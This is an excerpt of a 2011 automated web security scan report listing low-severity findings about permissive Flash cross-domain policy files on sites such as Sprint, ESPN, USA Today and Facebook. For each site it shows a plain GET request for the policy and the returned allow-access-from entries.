
The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.zvents.com

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 04 Sep 2011 01:00:47 GMT
Content-Type: text/xml
Content-Length: 201
Last-Modified: Thu, 26 May 2011 23:14:54 GMT
Connection: keep-alive
Expires: Mon, 05 Sep 2011 01:00:47 GMT
Cache-Control: max-age=86400
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

6.81. http://adadvisor.net/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://adadvisor.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: adadvisor.net

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:42:17 GMT
Connection: close
Server: AAWebServer
P3P: policyref="http://www.adadvisor.net/w3c/p3p.xml",CP="NOI NID"
Content-Length: 478
Content-Type: Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="
...[SNIP]...
<allow-access-from domain="*.tubemogul.com" />
...[SNIP]...
<allow-access-from domain="*.adap.tv" />
...[SNIP]...
<allow-access-from domain="*.videoegg.com" />
...[SNIP]...
<allow-access-from domain="*.tidaltv.com" />
...[SNIP]...

6.82. http://charlotteobserver.adperfect.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://charlotteobserver.adperfect.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: charlotteobserver.adperfect.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:22:19 GMT
Server: Apache
Last-Modified: Wed, 10 Aug 2011 00:38:56 GMT
Accept-Ranges: bytes
Content-Length: 343
MS-Author-Via: DAV
Connection: close
Content-Type: application/xml

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy>    <site-control permitted-cross-domain-policies="all" />    <allow-access-from domain="*.adperfect.com" />
...[SNIP]...

6.83. http://cm.npc-mcclatchy.overture.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://cm.npc-mcclatchy.overture.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: cm.npc-mcclatchy.overture.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:20:48 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Tue, 03 May 2011 10:14:38 GMT
Accept-Ranges: bytes
Content-Length: 639
Connection: close
Content-Type: application/xml

<?xml version="1.0" ?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="stage.mce.media.yahoo.com" secure="false" />
...[SNIP]...
<allow-access-from domain="mce.media.yahoo.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.yahoo.com" />
<allow-access-from domain="*.broadcast.com" />
<allow-access-from domain="*.launch.com" />
<allow-access-from domain="*.hotjobs.com" />
<allow-access-from domain="*.yimg.com" />
<allow-access-from domain="*.yahooligans.com" />
<allow-access-from domain="*.overture.com" />
...[SNIP]...

6.84. http://content.usatoday.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://content.usatoday.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: content.usatoday.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Wed, 16 Mar 2011 20:16:44 GMT
Accept-Ranges: bytes
ETag: "c3bb41117e4cb1:0"
Server: Microsoft-IIS/7.5
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Date: Sun, 04 Sep 2011 00:42:14 GMT
Connection: close
Content-Length: 1558

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.usatoday.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.usatoday.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="projects.usatoday.com"/>
   <allow-access-from domain="*.gannettonline.com"/>
   <allow-access-from domain="www.smashingideas.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="beta.tagware.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="nmp.newsgator.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="maventechnologies.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.maventechnologies.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="mavenapps.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.mavenapps.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="hostlogic.ca" secure="true"/>
...[SNIP]...
<allow-access-from domain="pages.samsung.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.pointroll.com" />
   <allow-access-from domain="*.facebook.com" />
   <allow-access-from domain="demo.pointroll.net" />
   <allow-access-from domain="*.brightcove.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.metagrapher.com" />
...[SNIP]...

6.85. http://delivery.sprint.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://delivery.sprint.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: delivery.sprint.com

Response

HTTP/1.1 200 OK
Content-Length: 9520
Content-Type: text/xml
Last-Modified: Tue, 26 Apr 2011 22:25:29 GMT
Accept-Ranges: bytes
ETag: "c695d9604cc1:1de6"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:22:23 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>

<!--Modified file on 1/5/2010 for security compl
...[SNIP]...
<allow-access-from domain="a676.g.akamaitech.net" />
<allow-access-from domain="staging.merchantmail.net" />
<allow-access-from domain="www.youcreatetheadventure.com" />
<allow-access-from domain="gap.p.delivery.net" />
<allow-access-from domain="*.akamaitech.net" />
<allow-access-from domain="*.garnier-rewards.com"/>
<allow-access-from domain="*.garnierrewards.com"/>
<allow-access-from domain="*.lexus.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.msn.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.msn-ppe.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.msn-int.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.msn-int.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.msads.net" secure="false" />
...[SNIP]...
<allow-access-from domain="comcast.beamland.com" />
<allow-access-from domain="webwalker06.comcastonline.com"/>
<allow-access-from domain="dynamic.abc.go.com"/>
<allow-access-from domain="ll.static.abc.com"/>
<allow-access-from domain="ll.media.abc.com"/>
<allow-access-from domain="*.abc.go.com"/>
<allow-access-from domain="*.abc.com"/>

<allow-access-from domain="www.sprintenterprise.com"/>
<allow-access-from domain="sprintenterprise.com"/>
<allow-access-from domain="*.eurorscg.com"/>


<allow-access-from domain="motifcdn.doubleclick.net" />
<allow-access-from domain="motifcdn2.doubleclick.net" />
<allow-access-from domain="m.doubleclick.net" />
<allow-access-from domain="m2.doubleclick.net" />
<allow-access-from domain="m3.doubleclick.net" />
<allow-access-from domain="m.2mdn.net" />
<allow-access-from domain="m2.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.dell.com" />
<allow-access-from domain="primediamags.com" />
<allow-access-from domain="sourceinterlinkpubs.com" />
<allow-access-from domain="wellsfargo.p.delivery.net" />
...[SNIP]...
<allow-access-from domain="betadfa.doubleclick.net" secure="true" />
...[SNIP]...
<allow-access-from domain="dfa.doubleclick.net" secure="true" />
...[SNIP]...
<allow-access-from domain="motifcdn2.doubleclick.net" secure="true" />
...[SNIP]...
<allow-access-from domain="ad.doubleclick.net" secure="true" />
...[SNIP]...
<allow-access-from domain="m1.2mdn.net" secure="true" />
...[SNIP]...
<allow-access-from domain="etrade.com" secure="true" />
...[SNIP]...
<allow-access-from domain="us.etrade.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.etrade.com" secure="true" />
...[SNIP]...
<allow-access-from domain="a248.e.akamai.net" secure="true" />
...[SNIP]...
<allow-access-from domain="pandora.luxus.fi" secure="true" />
...[SNIP]...
<allow-access-from domain="interactive.arn.com"/>
<allow-access-from domain="*.royalcaribbean.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.rccl.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.fedex.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.theweekmagazine.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.twmo.us" secure="false" />
...[SNIP]...
<allow-access-from domain="*.nokia.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.nokia.it" secure="false" />
...[SNIP]...
<allow-access-from domain="*.nokia.fi" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.nokia.fr" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.nokia.de" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.nokia.pt" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.nokia.ae" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.nokia.pl" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.nokia.hu" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.nokia.com.sa" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.nokia.at" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.nokia.ch" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.nokia.gr" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.nokia.es" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.nokia.ee" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.nokia.bg" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.nokia.nz" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.nokia.co.th" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.nokia.com.hr" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.nokia.si" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.nokia.cz" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.nokia.sk" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.nokia.com.tr" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.mea.nokia.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.nokia.se" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.nokia.dk" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.nokia.no" secure="false"/>
...[SNIP]...
<allow-access-from domain="view.atdmt.com" secure="false" />
...[SNIP]...
<allow-access-from domain="anon.screenplay.speedera.net" secure="false" />
...[SNIP]...
<allow-access-from domain="*.joyent.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.joyent.com" secure="false" />
...[SNIP]...
<allow-access-from domain="vmd-gap-app1" secure="false" />
...[SNIP]...
<allow-access-from domain="vmu-gap-app1" secure="false" />
...[SNIP]...
<allow-access-from domain="72.2.118.90" secure="false" />
...[SNIP]...
<allow-access-from domain="118.2.72.in-addr.arpa" secure="false" />
...[SNIP]...
<allow-access-from domain="vmu-gap-app1.sf.akqa.com" secure="false" />
...[SNIP]...
<allow-access-from domain="vmd-gap-app1.sf.akqa.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.gap.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="oldnavyweekly.com" secure="false" />
...[SNIP]...
<allow-access-from domain="stage.oldnavyweekly.com" secure="false" />
...[SNIP]...
<allow-access-from domain="dev.oldnavyweekly.com" secure="false" />
...[SNIP]...
<allow-access-from domain="oldnavyweekly.cpbinteractive.com" secure="false" />
...[SNIP]...
<allow-access-from domain="on.cpbstaging.com" secure="false" />
...[SNIP]...
<allow-access-from domain="oldnavyweekly.com.evohst.org" secure="false"/>
...[SNIP]...
<allow-access-from domain="stage.oldnavyweekly.com.evohst.org" secure="false"/>
...[SNIP]...
<allow-access-from domain="dev.oldnavyweekly.com.evohst.org" secure="false"/>
...[SNIP]...
<allow-access-from domain="onweeklydev.cpbstaging.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.samsclub.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="samsclub.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.rockfishinteractive.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.oldnavyweekly.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.cpbstaging.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.intava.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.lstudio.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.digitas.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="comcast.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.comcast.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.sprint.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.cheerfactory.com" secure="false" />
...[SNIP]...
<allow-access-from domain="app1.gap.preloading.co.uk" secure="false" />
...[SNIP]...
<allow-access-from domain="app2.gap.preloading.co.uk" secure="false" />
...[SNIP]...
<allow-access-from domain="*.asimpletheory.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.unicast.com" secure="false" />
...[SNIP]...
<allow-access-from domain="208.82.64.0" secure="true" />
...[SNIP]...
<allow-access-from domain="208.82.64.22" secure="true" />
...[SNIP]...
<allow-access-from domain="208.82.66.10" secure="true" />
...[SNIP]...
<allow-access-from domain="208.82.66.11" secure="true" />
...[SNIP]...
<allow-access-from domain="208.82.66.12" secure="true" />
...[SNIP]...
<allow-access-from domain="208.82.66.13" secure="true" />
...[SNIP]...
<allow-access-from domain="208.82.66.14" secure="true" />
...[SNIP]...
<allow-access-from domain="208.82.66.15" secure="true" />
...[SNIP]...
<allow-access-from domain="208.82.66.16" secure="true" />
...[SNIP]...
<allow-access-from domain="208.82.66.17" secure="true" />
...[SNIP]...
<allow-access-from domain="208.82.66.18" secure="true" />
...[SNIP]...
<allow-access-from domain="208.82.66.19" secure="true" />
...[SNIP]...
<allow-access-from domain="69.25.20.216" secure="true" />
...[SNIP]...
<allow-access-from domain="stage-user-comcast.com" secure="false" />
...[SNIP]...
<allow-access-from domain="24.40.23.69" secure="false" />
...[SNIP]...
<allow-access-from domain="68.87.60.144" secure="false" />
...[SNIP]...
<allow-access-from domain="*.acxiomdigital.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.jellyvision-conversation.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="159.153.236.12" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.progressive.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.materialdev.com" secure="false" />
...[SNIP]...

6.86. http://developers.facebook.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://developers.facebook.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: developers.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-FB-Server: 10.28.34.106
Connection: close
Content-Length: 1527

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
   <allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="s-static.ak.facebook.com" />
   <allow-access-from domain="www.facebook.com" />
   <allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
   <allow-access-from domain="static.ak.fbcdn.net" />
   <allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
   <allow-access-from domain="www.beta.facebook.com" />
...[SNIP]...

6.87. http://disqus.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://disqus.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: disqus.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:22:27 GMT
Server: Apache
Vary: Cookie,Accept-Encoding
X-User: anon:608614822849
p3p: CP="DSP IDC CUR ADM DELi STP NAV COM UNI INT PHY DEM"
Connection: close
Content-Type: text/x-cross-domain-policy

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.usopen.org" to-ports="80,96" secure="false" />
...[SNIP]...

6.88. http://espn.go.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://espn.go.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: espn.go.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=5184000
Connection: close
Date: Sun, 04 Sep 2011 01:22:27 GMT
Content-Type: text/xml
Last-Modified: Thu, 25 Aug 2011 19:50:02 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: N730
Cache-Expires: Tue, 01 Nov 2011 19:32:31 GMT
Content-Length: 7286
Vary: Accept-Encoding

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
   <allow-http-request-headers-from domain="*" headers="*"
...[SNIP]...
<allow-access-from domain="*.espn.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="profiles.sportsnation.espn.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="profiles.staging.espnfp.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.starwave.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.adsatt.espn.starwave.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.static.espn.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.abclocal.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.corp.espn3.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.espncdn.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.doubleclick.net" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.doubleclick.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.pointroll.com" to-ports="*"/>
   <allow-access-from domain="*.2mdn.net" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="m.uk.2mdn.net" secure="true" />
...[SNIP]...
<allow-access-from domain="m.fr.2mdn.net" secure="true" />
...[SNIP]...
<allow-access-from domain="m.se.2mdn.net" secure="true" />
...[SNIP]...
<allow-access-from domain="m.de.2mdn.net" secure="true" />
...[SNIP]...
<allow-access-from domain="*.arn.com"/>
   <allow-access-from domain="*.akamai.net" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.edgefcs.net" secure="false" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="clearspring.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.clearspring.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.espnmediaflo.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="host-a.oddcast.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="host-d.oddcast.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="host.staging.oddcast.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.l4b3l.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.atdmt.com" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.atlasrichmedia.com" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.atlasrichmedia.co.uk" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.atlasrichmedia.com.au" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.wknewyork.com" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.wknyc.com" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.yournbadestination.com" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.nba.com" to-ports="*"/>
   <allow-access-from domain="hive.cachefly.net" to-ports="*" />
...[SNIP]...
<allow-access-from domain="espn.nanogaming.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.dolimg.com" to-ports="*"/>
   <allow-access-from domain="*.yieldmanager.com" to-ports="*"/>
   <allow-access-from domain="*.akqa.com" to-ports="*"/>
   <allow-access-from domain="*.designbloxlive.com" to-ports="*"/>
   <allow-access-from domain="ds.serving-sys.com" to-ports="*"/>
   <allow-access-from domain="*.arndev.com" to-ports="*"/>
   <allow-access-from domain="nascar.blitzagency.com" to-ports="*"/>
   <allow-access-from domain="*.abc.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.vml.com" to-ports="*"/>
   <allow-access-from domain="*.vmltest.com" to-ports="*"/>
   <allow-access-from domain="*.vmldev.com" to-ports="*"/>
   <allow-access-from domain="*.vmlstage.com" to-ports="*"/>
   <allow-access-from domain="*.collegegameday.com" to-ports="*"/>
   <allow-access-from domain="dev.sarkissianmason.com" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.streamtheworld.com" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.adsfac.us" secure="true" />
...[SNIP]...
<allow-access-from domain="*.videoegg.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.corp.dig.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.google.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.youtube.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ytimg.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.client-projects.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="173.45.231.98" to-ports="*"/>
   <allow-access-from domain="abcpreview.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.facebook.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.theview.pseudosisu.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.theview.tv" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="redinter.vo.llnwd.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.soapnet.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="cdn.media.soapnet.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="sn.soapnet.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.brightcove.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="jayski.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.eyewonder.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.eyewonderlabs.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.squarewave.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="wpc.0C74.edgecastcdn.net" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.heavenspotdev.com" secure="true" />
...[SNIP]...
<allow-access-from domain="votecollector.go.com" to-ports="*" secure="true" />
...[SNIP]...
<allow-access-from domain="*.espndb.com"/>
   <allow-access-from domain="*.foxtel.com.au" secure="true" />
...[SNIP]...
<allow-access-from domain="*.unicast.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.verizon.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.verizon.net" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.espn.pvt" to-ports="*"/>
   <allow-access-from domain="*.xif.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.dartmotif.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.miclients.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="adimages.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.questionmarket.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="all360poker.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.adinterax.com" />
   <allow-access-from domain="infinitidev.tbwachiatdev.com" />
   <allow-access-from domain="*.coachespicmixerterms.com" />
   <allow-access-from domain="*.coachpicmixerprivacypolicy.com" />
   <allow-access-from domain="*.ooyala.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.playdom.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.sportsR.us" to-ports="*" secure="false" />
...[SNIP]...
